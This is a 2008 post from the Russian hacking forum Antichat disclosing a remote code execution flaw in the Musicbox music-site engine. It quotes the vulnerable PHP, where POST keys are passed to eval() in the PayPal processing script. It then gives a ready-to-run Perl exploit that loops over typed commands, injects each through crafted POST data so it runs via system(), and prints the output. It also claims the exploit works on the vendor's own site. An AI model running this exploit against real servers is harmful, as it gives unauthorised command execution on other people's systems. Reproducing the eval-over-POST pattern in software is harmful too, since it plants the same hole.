Форум АНТИЧАТ

Musicbox RCE

18.01.2008, 00:59

Macro

Постоянный

Регистрация: 11.11.2006

Сообщений: 595

Провел на форуме:
1845062

Репутация: 1079

Musicbox RCE

Исполнение произвольного кода в движке Musicbox (двиг музыкального сайта)
Возможно, все версии

Сайт производителя
http://www.musicboxv2.com/
(приведенный ниже эксплоит для исполнения команд на нем работает)

Уязвимый код:
/cart/process_paypal.php

PHP код:


		
			




$paypal_ipn = new paypal_ipn($paypal_info);



foreach ($paypal_ipn->paypal_post_vars as $key=>$value) {

    if (getType($key)=="string") {

        eval("\$$key=\$value;");

        }

}

Класс paypal_ipn и его встроенная функция возвращают массив POST без всяких изменений, поэтому налицо исполнение кода.

Эксплоит:

Код:

#!/usr/bin/perl

#powered by Black Toad Team brains
#coded by Macro

use HTTP::Cookies;
use MIME::Base64;
use LWP;
my $cmd='';

sub urlencode {
  my $str = shift;
  $str =~ s/\s/%20/;
  return $str;
}

until($cmd eq 'exit'){
print '#';
$cmd=<STDIN>;
chomp($cmd);
$host=$ARGV[0];
$path=$ARGV[0];
$host=~s/(http:\/\/[^\/]+)/$1/;
$path=~s/http:\/\/[^\/]+(.*)/$1/;
my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)',timeout=>10);
$data="c=".urlencode($cmd)."&a;system(\$c);\$c=1";
my $req = HTTP::Request->new(POST => $ARGV[0].'/cart/process_paypal.php');
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
$content=$res->content;
print $content."\n";
}

Кстати, бага найдена мной

Последний раз редактировалось Macro; 18.01.2008 в 01:05..